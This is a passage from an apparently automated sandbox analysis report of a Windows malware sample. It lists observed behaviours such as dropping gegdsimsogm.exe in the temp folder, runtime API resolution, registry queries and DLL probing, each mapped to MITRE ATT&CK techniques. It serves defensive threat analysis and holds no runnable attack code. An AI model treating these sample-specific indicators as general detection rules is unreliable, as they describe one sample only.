00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ac0000\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"KERNEL32\" at base 763c0000\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b3b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4bd75@RPCRT4.dll\"\n \"15001600c03e436a@ADVAPI32.dll\"\n \"0e000f00703f436a@ADVAPI32.dll\"\n \"0e000f00cc3f436a@ADVAPI32.dll\"\n \"11001200b447436a@ADVAPI32.dll\"\n \"110012004848436a@ADVAPI32.dll\"\n \"120013008c48436a@ADVAPI32.dll\"\n \"12001300e448436a@ADVAPI32.dll\"\n \"14001500386e436a@ADVAPI32.dll\"\n \"14001500506e436a@ADVAPI32.dll\"\n \"14001500686e436a@ADVAPI32.dll\"\n \"17001800806e436a@ADVAPI32.dll\"\n \"0d000e00986e436a@ADVAPI32.dll\"\n \"11001200a86e436a@ADVAPI32.dll\"\n \"11001200bc6e436a@ADVAPI32.dll\"\n \"0d000e003449436a@SHELL32.dll\"\n \"0d000e00b049436a@SHELL32.dll\"\n \"0f001000fc6f436a@ADVAPI32.dll\"\n \"140015003c70436a@ADVAPI32.dll\"\n \"140015005470436a@ADVAPI32.dll\"\n \"0c000d009c70436a@ADVAPI32.dll\"\n \"0c000d00ac70436a@ADVAPI32.dll\"\n \"0e000f00bc70436a@ADVAPI32.dll\"\n \"0e000f00cc70436a@ADVAPI32.dll\"\n \"0b000c00dc70436a@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005872)\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"gegdsimsogm.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A9C8A7.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9C8A7.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9C8A7.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" has an executable section named \".text\"\n \"gegdsimsogm.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67A9C8A7.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" has an writable section named \".data\"\n \"gegdsimsogm.exe\" has an writable section named \".data\"\n \"DISMHOST.EXE.67A9C8A7.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: gegdsimsogm.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A9C8A7.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A9C8A7.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"NtShutdownSystem\" (Indicator: \"ShutdownSystem\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\" was detected as \"Microsoft visual C++ 7.0\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft visual C++ 7.0\"\n \"DISMHOST.EXE.67A9C8A7.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005872]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"c:\\cbwvqpkjedc1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\CBWVQPKJEDC1576C273B686607E24365FFB26CF93F2E965690F57AFBA4D4C7585C84365110.EXE\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\GEGDSIMSOGM.EXE\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"c:\\jkzeoxfr\\c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"c:\\cbwvqpkjedc1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\gegdsimsogm.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe.Local\\\"\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005872]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: 00000000-00005872]\n \"DISMHOST.EXE.67A9C8A7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00005872]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: 